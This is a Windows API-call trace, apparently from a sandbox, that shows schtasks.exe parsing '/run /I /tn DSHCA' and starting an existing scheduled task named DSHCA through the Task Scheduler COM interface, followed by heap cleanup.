[0215.902] _memicmp (_Buf1=0x5f4b30, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.902] _vsnwprintf (in: _Buffer=0x5f5970, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x14f394 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0215.903] VerQueryValueW (in: pBlock=0x5f5b80, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x14f3bc, puLen=0x14f3b8 | out: lplpBuffer=0x14f3bc*=0x5f5d48, puLen=0x14f3b8) returned 1 [0215.903] lstrlenW (lpString="schtasks.exe") returned 12 [0215.903] lstrlenW (lpString="schtasks.exe") returned 12 [0215.903] lstrlenW (lpString=".EXE") returned 4 [0215.903] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0215.903] lstrlenW (lpString="schtasks.exe") returned 12 [0215.903] lstrlenW (lpString=".EXE") returned 4 [0215.903] lstrlenW (lpString="schtasks") returned 8 [0215.903] lstrlenW (lpString="/run") returned 4 [0215.903] _memicmp (_Buf1=0x5f4b30, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.903] _vsnwprintf (in: _Buffer=0x5f5970, _BufferCount=0x16, _Format="%s %s", _ArgList=0x14f394 | out: _Buffer="schtasks /run") returned 13 [0215.903] _memicmp (_Buf1=0x5f4b90, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.903] GetProcessHeap () returned 0x5e0000 [0215.903] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5248 [0215.903] _memicmp (_Buf1=0x5f4ba8, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.903] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x5f6608, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0215.903] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0215.903] GetProcessHeap () returned 0x5e0000 [0215.903] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x30) returned 0x5f6848 [0215.903] _vsnwprintf (in: _Buffer=0x5f6560, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x14f398 | out: _Buffer="Type \"SCHTASKS /RUN /?\" for usage.") returned 34 [0215.903] GetProcessHeap () returned 0x5e0000 [0215.903] GetProcessHeap () returned 0x5e0000 [0215.903] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5b80) returned 1 [0215.903] GetProcessHeap () returned 0x5e0000 [0215.903] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5b80) returned 0x74e [0215.904] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5b80 | out: hHeap=0x5e0000) returned 1 [0215.904] SetLastError (dwErrCode=0x0) [0215.904] GetThreadLocale () returned 0x409 [0215.904] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.904] lstrlenW (lpString="run") returned 3 [0215.904] GetThreadLocale () returned 0x409 [0215.904] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.904] lstrlenW (lpString="?") returned 1 [0215.904] GetThreadLocale () returned 0x409 [0215.904] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.904] lstrlenW (lpString="s") returned 1 [0215.904] GetThreadLocale () returned 0x409 [0215.904] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.904] lstrlenW (lpString="u") returned 1 [0215.904] GetThreadLocale () returned 0x409 [0215.904] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.904] lstrlenW (lpString="p") returned 1 [0215.904] GetThreadLocale () returned 0x409 [0215.904] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.904] lstrlenW (lpString="i") returned 1 [0215.904] GetThreadLocale () returned 0x409 [0215.904] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0215.904] lstrlenW (lpString="tn") returned 2 [0215.904] SetLastError (dwErrCode=0x0) [0215.904] SetLastError (dwErrCode=0x0) [0215.904] lstrlenW (lpString="/Run") returned 4 [0215.904] lstrlenW (lpString="-/") returned 2 [0215.904] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0215.904] lstrlenW (lpString="run") returned 3 [0215.905] lstrlenW (lpString="run") returned 3 [0215.905] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.905] lstrlenW (lpString="Run") returned 3 [0215.905] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.905] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|run|") returned 5 [0215.905] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|Run|") returned 5 [0215.905] lstrlenW (lpString="|run|") returned 5 [0215.905] lstrlenW (lpString="|Run|") returned 5 [0215.905] StrStrIW (lpFirst="|run|", lpSrch="|Run|") returned="|run|" [0215.905] SetLastError (dwErrCode=0x0) [0215.905] SetLastError (dwErrCode=0x0) [0215.905] SetLastError (dwErrCode=0x0) [0215.905] lstrlenW (lpString="/I") returned 2 [0215.905] lstrlenW (lpString="-/") returned 2 [0215.905] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0215.905] lstrlenW (lpString="run") returned 3 [0215.905] lstrlenW (lpString="run") returned 3 [0215.905] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.905] lstrlenW (lpString="I") returned 1 [0215.905] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.905] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|run|") returned 5 [0215.905] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|I|") returned 3 [0215.905] lstrlenW (lpString="|run|") returned 5 [0215.905] lstrlenW (lpString="|I|") returned 3 [0215.905] StrStrIW (lpFirst="|run|", lpSrch="|I|") returned 0x0 [0215.905] SetLastError (dwErrCode=0x490) [0215.906] lstrlenW (lpString="?") returned 1 [0215.906] lstrlenW (lpString="?") returned 1 [0215.906] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.906] lstrlenW (lpString="I") returned 1 [0215.906] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.906] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|?|") returned 3 [0215.906] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|I|") returned 3 [0215.906] lstrlenW (lpString="|?|") returned 3 [0215.906] lstrlenW (lpString="|I|") returned 3 [0215.906] StrStrIW (lpFirst="|?|", lpSrch="|I|") returned 0x0 [0215.906] SetLastError (dwErrCode=0x490) [0215.906] lstrlenW (lpString="s") returned 1 [0215.906] lstrlenW (lpString="s") returned 1 [0215.906] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.906] lstrlenW (lpString="I") returned 1 [0215.906] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.906] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|s|") returned 3 [0215.906] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|I|") returned 3 [0215.906] lstrlenW (lpString="|s|") returned 3 [0215.906] lstrlenW (lpString="|I|") returned 3 [0215.906] StrStrIW (lpFirst="|s|", lpSrch="|I|") returned 0x0 [0215.906] SetLastError (dwErrCode=0x490) [0215.906] lstrlenW (lpString="u") returned 1 [0215.906] lstrlenW (lpString="u") returned 1 [0215.906] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.907] lstrlenW (lpString="I") returned 1 [0215.907] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.907] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|u|") returned 3 [0215.907] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|I|") returned 3 [0215.907] lstrlenW (lpString="|u|") returned 3 [0215.907] lstrlenW (lpString="|I|") returned 3 [0215.907] StrStrIW (lpFirst="|u|", lpSrch="|I|") returned 0x0 [0215.907] SetLastError (dwErrCode=0x490) [0215.907] lstrlenW (lpString="p") returned 1 [0215.907] lstrlenW (lpString="p") returned 1 [0215.907] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.907] lstrlenW (lpString="I") returned 1 [0215.907] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.907] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|p|") returned 3 [0215.907] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|I|") returned 3 [0215.907] lstrlenW (lpString="|p|") returned 3 [0215.907] lstrlenW (lpString="|I|") returned 3 [0215.907] StrStrIW (lpFirst="|p|", lpSrch="|I|") returned 0x0 [0215.907] SetLastError (dwErrCode=0x490) [0215.907] lstrlenW (lpString="i") returned 1 [0215.907] lstrlenW (lpString="i") returned 1 [0215.907] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.907] lstrlenW (lpString="I") returned 1 [0215.907] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.908] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|i|") returned 3 [0215.908] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|I|") returned 3 [0215.908] lstrlenW (lpString="|i|") returned 3 [0215.908] lstrlenW (lpString="|I|") returned 3 [0215.908] StrStrIW (lpFirst="|i|", lpSrch="|I|") returned="|i|" [0215.908] SetLastError (dwErrCode=0x0) [0215.908] SetLastError (dwErrCode=0x0) [0215.908] SetLastError (dwErrCode=0x0) [0215.908] lstrlenW (lpString="/tn") returned 3 [0215.908] lstrlenW (lpString="-/") returned 2 [0215.908] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0215.908] lstrlenW (lpString="run") returned 3 [0215.908] lstrlenW (lpString="run") returned 3 [0215.908] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.908] lstrlenW (lpString="tn") returned 2 [0215.908] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.908] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|run|") returned 5 [0215.908] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|tn|") returned 4 [0215.908] lstrlenW (lpString="|run|") returned 5 [0215.908] lstrlenW (lpString="|tn|") returned 4 [0215.908] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0215.908] SetLastError (dwErrCode=0x490) [0215.908] lstrlenW (lpString="?") returned 1 [0215.908] lstrlenW (lpString="?") returned 1 [0215.908] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.908] lstrlenW (lpString="tn") returned 2 [0215.908] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.909] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|?|") returned 3 [0215.909] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|tn|") returned 4 [0215.909] lstrlenW (lpString="|?|") returned 3 [0215.909] lstrlenW (lpString="|tn|") returned 4 [0215.909] SetLastError (dwErrCode=0x490) [0215.909] lstrlenW (lpString="s") returned 1 [0215.909] lstrlenW (lpString="s") returned 1 [0215.909] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.909] lstrlenW (lpString="tn") returned 2 [0215.909] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.909] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|s|") returned 3 [0215.909] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|tn|") returned 4 [0215.909] lstrlenW (lpString="|s|") returned 3 [0215.909] lstrlenW (lpString="|tn|") returned 4 [0215.909] SetLastError (dwErrCode=0x490) [0215.909] lstrlenW (lpString="u") returned 1 [0215.909] lstrlenW (lpString="u") returned 1 [0215.909] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.909] lstrlenW (lpString="tn") returned 2 [0215.909] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.909] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|u|") returned 3 [0215.909] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|tn|") returned 4 [0215.909] lstrlenW (lpString="|u|") returned 3 [0215.909] lstrlenW (lpString="|tn|") returned 4 [0215.909] SetLastError (dwErrCode=0x490) [0215.910] lstrlenW (lpString="p") returned 1 [0215.910] lstrlenW (lpString="p") returned 1 [0215.910] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.910] lstrlenW (lpString="tn") returned 2 [0215.910] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.910] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|p|") returned 3 [0215.910] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|tn|") returned 4 [0215.910] lstrlenW (lpString="|p|") returned 3 [0215.910] lstrlenW (lpString="|tn|") returned 4 [0215.910] SetLastError (dwErrCode=0x490) [0215.910] lstrlenW (lpString="i") returned 1 [0215.910] lstrlenW (lpString="i") returned 1 [0215.910] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.910] lstrlenW (lpString="tn") returned 2 [0215.910] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.910] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|i|") returned 3 [0215.910] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|tn|") returned 4 [0215.910] lstrlenW (lpString="|i|") returned 3 [0215.910] lstrlenW (lpString="|tn|") returned 4 [0215.910] SetLastError (dwErrCode=0x490) [0215.910] lstrlenW (lpString="tn") returned 2 [0215.910] lstrlenW (lpString="tn") returned 2 [0215.910] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.910] lstrlenW (lpString="tn") returned 2 [0215.911] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.911] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|tn|") returned 4 [0215.911] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f380 | out: _Buffer="|tn|") returned 4 [0215.911] lstrlenW (lpString="|tn|") returned 4 [0215.911] lstrlenW (lpString="|tn|") returned 4 [0215.911] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0215.911] SetLastError (dwErrCode=0x0) [0215.911] SetLastError (dwErrCode=0x0) [0215.911] lstrlenW (lpString="DSHCA") returned 5 [0215.911] lstrlenW (lpString="-/") returned 2 [0215.911] StrChrIW (lpStart="-/", wMatch=0x44) returned 0x0 [0215.911] SetLastError (dwErrCode=0x490) [0215.911] SetLastError (dwErrCode=0x490) [0215.911] SetLastError (dwErrCode=0x0) [0215.911] lstrlenW (lpString="DSHCA") returned 5 [0215.911] StrChrIW (lpStart="DSHCA", wMatch=0x3a) returned 0x0 [0215.911] SetLastError (dwErrCode=0x490) [0215.911] SetLastError (dwErrCode=0x0) [0215.911] lstrlenW (lpString="DSHCA") returned 5 [0215.911] SetLastError (dwErrCode=0x0) [0215.911] lstrlenW (lpString="DSHCA") returned 5 [0215.911] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0219.842] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0222.577] CoCreateInstance (in: rclsid=0x1d230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x1d20fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x14ef8c | out: ppv=0x14ef8c*=0x233cc8) returned 0x0 [0222.593] TaskScheduler:ITaskService:Connect (This=0x233cc8, serverName=0x14eefc*(varType=0x8, wReserved1=0x0, wReserved2=0x40, wReserved3=0x42, varVal1=0x0, varVal2=0x0), user=0x14ef0c*(varType=0x0, wReserved1=0x14, wReserved2=0x6c, wReserved3=0x0, varVal1=0x14f390, varVal2=0x14f010), domain=0x14ef1c*(varType=0x0, wReserved1=0x14, wReserved2=0x9cde, wReserved3=0x76f9, varVal1=0x14f010, varVal2=0x0), password=0x14ef2c*(varType=0x0, wReserved1=0x14, wReserved2=0x9c39, wReserved3=0x76f9, varVal1=0x14f010, varVal2=0x380)) returned 0x0 [0223.745] TaskScheduler:IUnknown:AddRef (This=0x233cc8) returned 0x2 [0223.745] TaskScheduler:ITaskService:GetFolder (in: This=0x233cc8, Path=0x0, ppFolder=0x14eff8 | out: ppFolder=0x14eff8*=0x233d30) returned 0x0 [0223.750] ITaskFolder:GetTask (in: This=0x233d30, Path="DSHCA", ppTask=0x14effc | out: ppTask=0x14effc*=0x233d70) returned 0x0 [0223.773] IRegisteredTask:get_State (in: This=0x233d70, pState=0x14efe8 | out: pState=0x14efe8*=3) returned 0x0 [0224.021] IRegisteredTask:RunEx (in: This=0x233d70, params=0x14ef94*(varType=0x0, wReserved1=0x14, wReserved2=0x3879, wReserved3=0x77c8, varVal1=0xf00b8, varVal2=0xf0000), flags=2, sessionID=0, user=0x0, ppRunningTask=0x14eff4 | out: ppRunningTask=0x14eff4*=0x233db8) returned 0x0 [0224.026] GetProcessHeap () returned 0x5e0000 [0224.026] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5608 [0224.026] _memicmp (_Buf1=0x5f4ba8, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0224.026] LoadStringW (in: hInstance=0x0, uID=0x130, lpBuffer=0x5f6608, cchBufferMax=256 | out: lpBuffer="SUCCESS: Attempted to run the scheduled task \"%s\".\n") returned 0x33 [0224.026] lstrlenW (lpString="SUCCESS: Attempted to run the scheduled task \"%s\".\n") returned 51 [0224.026] GetProcessHeap () returned 0x5e0000 [0224.026] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x68) returned 0x606d98 [0224.026] _vsnwprintf (in: _Buffer=0x14f004, _BufferCount=0x1fb, _Format="SUCCESS: Attempted to run the scheduled task \"%s\".\n", _ArgList=0x14efb0 | out: _Buffer="SUCCESS: Attempted to run the scheduled task \"DSHCA\".\n") returned 54 [0224.026] _fileno (_File=0x77032920) returned 1 [0224.026] _errno () returned 0x2307d8 [0224.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.026] _errno () returned 0x2307d8 [0224.026] GetFileType (hFile=0x7) returned 0x2 [0224.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0224.027] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef74 | out: lpMode=0x14ef74) returned 1 [0224.027] __iob_func () returned 0x77032900 [0224.027] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0224.027] lstrlenW (lpString="SUCCESS: Attempted to run the scheduled task \"DSHCA\".\n") returned 54 [0224.027] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x14f004*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x14ef9c, lpReserved=0x0 | out: lpBuffer=0x14f004*, lpNumberOfCharsWritten=0x14ef9c*=0x36) returned 1 [0224.028] IUnknown:Release (This=0x233db8) returned 0x0 [0224.028] IUnknown:Release (This=0x233d70) returned 0x0 [0224.028] TaskScheduler:IUnknown:Release (This=0x233d30) returned 0x0 [0224.028] TaskScheduler:IUnknown:Release (This=0x233cc8) returned 0x1 [0224.028] GetProcessHeap () returned 0x5e0000 [0224.028] GetProcessHeap () returned 0x5e0000 [0224.028] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4bd8) returned 1 [0224.028] GetProcessHeap () returned 0x5e0000 [0224.028] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4bd8) returned 0x10 [0224.028] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4bd8 | out: hHeap=0x5e0000) returned 1 [0224.028] GetProcessHeap () returned 0x5e0000 [0224.028] GetProcessHeap () returned 0x5e0000 [0224.028] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ab8) returned 1 [0224.028] GetProcessHeap () returned 0x5e0000 [0224.028] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4ab8) returned 0x10 [0224.028] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ab8 | out: hHeap=0x5e0000) returned 1 [0224.028] GetProcessHeap () returned 0x5e0000 [0224.028] GetProcessHeap () returned 0x5e0000 [0224.028] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5268) returned 1 [0224.028] GetProcessHeap () returned 0x5e0000 [0224.028] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5268) returned 0x14 [0224.028] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5268 | out: hHeap=0x5e0000) returned 1 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6560) returned 1 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f6560) returned 0xa0 [0224.029] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6560 | out: hHeap=0x5e0000) returned 1 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4b90) returned 1 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4b90) returned 0x10 [0224.029] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4b90 | out: hHeap=0x5e0000) returned 1 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5188) returned 1 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5188) returned 0x14 [0224.029] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5188 | out: hHeap=0x5e0000) returned 1 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5970) returned 1 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5970) returned 0x208 [0224.029] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5970 | out: hHeap=0x5e0000) returned 1 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4b30) returned 1 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4b30) returned 0x10 [0224.029] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4b30 | out: hHeap=0x5e0000) returned 1 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.029] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f50e8) returned 1 [0224.029] GetProcessHeap () returned 0x5e0000 [0224.030] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f50e8) returned 0x14 [0224.030] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f50e8 | out: hHeap=0x5e0000) returned 1 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6608) returned 1 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f6608) returned 0x200 [0224.030] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6608 | out: hHeap=0x5e0000) returned 1 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ba8) returned 1 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4ba8) returned 0x10 [0224.030] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ba8 | out: hHeap=0x5e0000) returned 1 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5088) returned 1 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5088) returned 0x14 [0224.030] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5088 | out: hHeap=0x5e0000) returned 1 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4c08) returned 1 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4c08) returned 0xe 